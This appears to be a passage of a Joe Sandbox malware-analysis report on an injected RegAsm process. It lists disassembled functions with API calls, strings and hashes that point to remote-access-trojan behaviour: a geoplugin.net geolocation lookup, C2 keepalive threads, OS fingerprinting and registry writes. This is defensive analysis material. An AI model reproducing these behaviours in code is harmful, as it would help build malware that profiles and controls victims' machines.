                                                                        Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1406 40da34-40da59 call 401f86 1409 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1406->1409 1410 40da5f 1406->1410 1411 40da70-40da7e call 41b5b4 call 401f13 1410->1411 1412 40da91-40da96 1410->1412 1413 40db51-40db56 1410->1413 1414 40daa5-40daac call 41bfb7 1410->1414 1415 40da66-40da6b 1410->1415 1416 40db58-40db5d 1410->1416 1417 40da9b-40daa0 1410->1417 1418 40db6e 1410->1418 1419 40db5f-40db64 call 43c0cf 1410->1419 1440 40da83 1411->1440 1421 40db73-40db78 call 43c0cf 1412->1421 1413->1421 1432 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1414->1432 1433 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1414->1433 1415->1421 1416->1421 1417->1421 1418->1421 1428 40db69-40db6c 1419->1428 1434 40db79-40db7e call 409057 1421->1434 1428->1418 1428->1434 1432->1440 1445 40da87-40da8c call 401f09 1433->1445 1434->1409 1440->1445 1445->1409
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                        • API String ID: 82841172-425784914
                                                                        • Opcode ID: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                        • Opcode Fuzzy Hash: d5af02d33e376a7b237a9cdb7674b417df9d4ecade9ec5cfff040e37113fa090
                                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                                        Function 0041B2C3 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1488 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1499 41b35d-41b366 1488->1499 1500 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1488->1500 1502 41b368-41b36d 1499->1502 1503 41b36f 1499->1503 1510 41b355-41b358 call 401fd8 1500->1510 1511 41b349-41b352 call 41cf69 1500->1511 1504 41b374-41b37f call 40537d 1502->1504 1503->1504 1510->1499 1511->1510
                                                                        APIs
                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                        • String ID: (32 bit)$ (64 bit)$@5U$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                        • API String ID: 782494840-3750562216
                                                                        • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                        • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                        Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1515 44ac49-44ac62 1516 44ac64-44ac74 call 446766 1515->1516 1517 44ac78-44ac7d 1515->1517 1516->1517 1525 44ac76 1516->1525 1519 44ac7f-44ac87 1517->1519 1520 44ac8a-44acae MultiByteToWideChar 1517->1520 1519->1520 1522 44acb4-44acc0 1520->1522 1523 44ae41-44ae54 call 434fcb 1520->1523 1526 44ad14 1522->1526 1527 44acc2-44acd3 1522->1527 1525->1517 1531 44ad16-44ad18 1526->1531 1528 44acd5-44ace4 call 457190 1527->1528 1529 44acf2-44ad03 call 446137 1527->1529 1534 44ae36 1528->1534 1540 44acea-44acf0 1528->1540 1529->1534 1541 44ad09 1529->1541 1531->1534 1535 44ad1e-44ad31 MultiByteToWideChar 1531->1535 1539 44ae38-44ae3f call 435e40 1534->1539 1535->1534 1538 44ad37-44ad49 call 448bb3 1535->1538 1545 44ad4e-44ad52 1538->1545 1539->1523 1544 44ad0f-44ad12 1540->1544 1541->1544 1544->1531 1545->1534 1547 44ad58-44ad5f 1545->1547 1548 44ad61-44ad66 1547->1548 1549 44ad99-44ada5 1547->1549 1548->1539 1550 44ad6c-44ad6e 1548->1550 1551 44ada7-44adb8 1549->1551 1552 44adf1 1549->1552 1550->1534 1553 44ad74-44ad8e call 448bb3 1550->1553 1555 44add3-44ade4 call 446137 1551->1555 1556 44adba-44adc9 call 457190 1551->1556 1554 44adf3-44adf5 1552->1554 1553->1539 1567 44ad94 1553->1567 1558 44adf7-44ae10 call 448bb3 1554->1558 1559 44ae2f-44ae35 call 435e40 1554->1559 1555->1559 1571 44ade6 1555->1571 1556->1559 1570 44adcb-44add1 1556->1570 1558->1559 1573 44ae12-44ae19 1558->1573 1559->1534 1567->1534 1572 44adec-44adef 1570->1572 1571->1572 1572->1554 1574 44ae55-44ae5b 1573->1574 1575 44ae1b-44ae1c 1573->1575 1576 44ae1d-44ae2d WideCharToMultiByte 1574->1576 1575->1576 1576->1559 1577 44ae5d-44ae64 call 435e40 1576->1577 1577->1539
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                        • __freea.LIBCMT ref: 0044AE30
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • __freea.LIBCMT ref: 0044AE39
                                                                        • __freea.LIBCMT ref: 0044AE5E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 3864826663-0
                                                                        • Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                        • Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
                                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                        Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1643 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1648 41b3c5-41b3e6 InternetReadFile 1643->1648 1649 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1648->1649 1650 41b40c-41b40f 1648->1650 1649->1650 1652 41b411-41b413 1650->1652 1653 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1650->1653 1652->1648 1652->1653 1657 41b427-41b431 1653->1657
                                                                        APIs
                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                        Strings
                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                        • String ID: http://geoplugin.net/json.gp
                                                                        • API String ID: 3121278467-91888290
                                                                        • Opcode ID: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                        • Opcode Fuzzy Hash: 961cfb38cd55e61572119c0efa1b6417dc8b0c9b1577fd71b4996ae3f28eea1b
                                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                        Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                        • __freea.LIBCMT ref: 10008A08
                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                        • __freea.LIBCMT ref: 10008A11
                                                                        • __freea.LIBCMT ref: 10008A36
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1414292761-0
                                                                        • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                        • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                        • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                        • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                        Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountEventTick
                                                                        • String ID: !D@$NG
                                                                        • API String ID: 180926312-2721294649
                                                                        • Opcode ID: a462973d742854930533713db4b247c4557c7a610cccef5313c8c1b0fc3ae439
                                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                        • Opcode Fuzzy Hash: a462973d742854930533713db4b247c4557c7a610cccef5313c8c1b0fc3ae439
                                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$EventLocalThreadTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 2532271599-1507639952
                                                                        • Opcode ID: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                        • Opcode Fuzzy Hash: f26594ba8ec3a82e1af01c42dab2d510cffb8817789c9245bc2ee9d3b928716d
                                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                        Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                        • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                        • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 1818849710-4028850238
                                                                        • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                                        • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                                        Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3360349984-0
                                                                        • Opcode ID: c82d23fa68d4f54fa7345513474a4fa3003979eb866de3c2de6de2f22e2b7063
                                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                                        • Opcode Fuzzy Hash: c82d23fa68d4f54fa7345513474a4fa3003979eb866de3c2de6de2f22e2b7063
                                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                        Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                          • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2905821283-0
                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                        • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                        Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                        • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3177248105-0
                                                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                        Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                        • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3177248105-0
                                                                        • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                        • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                        • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                        • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                        Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleReadSize
                                                                        • String ID:
                                                                        • API String ID: 3919263394-0
                                                                        • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                                        • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                                        Function 00414EE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,@5U,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                        • String ID: @5U
                                                                        • API String ID: 1170566393-921383711
                                                                        • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                        • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
